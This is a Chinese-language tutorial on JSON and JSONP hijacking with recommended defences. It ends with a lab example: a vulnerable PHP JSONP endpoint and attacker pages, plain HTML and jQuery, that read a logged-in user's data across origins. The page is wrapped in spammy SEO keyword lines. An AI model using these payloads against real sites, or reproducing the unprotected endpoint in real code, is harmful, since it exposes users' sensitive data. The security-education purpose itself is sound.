91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

詳解JSON和JSONP劫持以及解決方法

發布時間:2020-08-21 05:49:51 來源:腳本之家 閱讀:433 作者:yjclsx 欄目:web開發

json劫持

json劫持攻擊又為”JSON Hijacking”,攻擊過程有點類似于csrf,只不過csrf只管發送http請求,但是json-hijack的目的是獲取敏感數據。

一些web應用會把一些敏感數據以json的形式返回到前端,如果僅僅通過cookie來判斷請求是否合法,那么就可以利用類似csrf的手段,向目標服務器發送請求,以獲得敏感數據。

比如下面的鏈接在已登錄的情況下會返回json格式的用戶信息:

http://www.test.com/userinfo

攻擊者可以在自己的虛假頁面中,加入如下標簽:

<script src="http://www.test.com/userinfo"></script>

如果當前瀏覽器已經登錄了www.test.com,并且cookie未過期,然后訪問了攻擊者的虛假頁面,那么該頁面就可以拿到json形式的用戶敏感信息,因為script標簽會自動解析json數據,生成對應的js對象。然后再通過

Object.prototype.__defineSetter__

這個函數來觸發自己的惡意代碼。

但是這個函數在當前的新版本chrome和firefox中都已經失效了。

jsonp劫持

jsonp是一個非官方的協議,利用script元素的開放策略,網頁可以得到從其他來源動態產生的json數據,因此可以用來實現跨域。(關于JSONP可以參考我的博文:https://www.jb51.net/article/31167.htm)

web程序如果通過這種方式跨域之后,攻擊者完全可以在自己的虛假頁面中發起惡意的jsonp請求,這就引來了安全問題。比如:

<script>
function useUserInfo(v){
  alert(v.username);
}
</script>
<script src="http://www.test.com/userinfo?callback=useUserInfo"></script>

如果服務器端的userinfo接口支持jsonp,那就會使虛假頁面成功執行useUserInfo函數,從而導致安全問題。

解決方法

其實json劫持和jsonp劫持屬于CSRF( Cross-site request forgery 跨站請求偽造)的攻擊范疇,所以解決的方法和解決csrf的方法一樣。

1、驗證 HTTP Referer 頭信息;
2、在請求中添加 csrfToken 并在后端進行驗證;

關于CSRF攻擊可以參考我的博文:https://www.jb51.net/article/157550.htm 

PS:JSONP劫持漏洞實例

getUser.php

<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//獲取回調函數名
//json數據
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"Aaron"})';
echo $jsoncallback . "(" . $json_data . ")";//輸出jsonp格式的數據
?>

Payload利用:

客戶端實現 callbackFunction 函數

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持測試</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
    {
      alert(result.name);
    }
</script>
<script type="text/javascript" src="http://127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>

jQuery 使用 JSONP

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>JSONP劫持測試</title>
  <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>  
</head>
<body>
<div id="divCustomers"></div>

<script type="text/javascript">  
  $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){
     alert(getUsers.name);
  });
</script>
</body>
</html>

以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持億速云。權聲明:本文為博主原創文章,轉載請附上博文鏈接!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

苏州市| 普格县| 曲沃县| 花莲市| 民权县| 蓝田县| 兴隆县| 闸北区| 长宁区| 昔阳县| 大名县| 葵青区| 元谋县| 年辖:市辖区| 靖边县| 壤塘县| 凤山县| 佳木斯市| 汝城县| 呼玛县| 横山县| 宜兴市| 个旧市| 西青区| 凤冈县| 玛纳斯县| 甘孜| 丽江市| 洛川县| 吐鲁番市| 锡林郭勒盟| 广丰县| 湘潭市| 利川市| 靖边县| 遂昌县| 无极县| 福海县| 德昌县| 岳西县| 高雄市|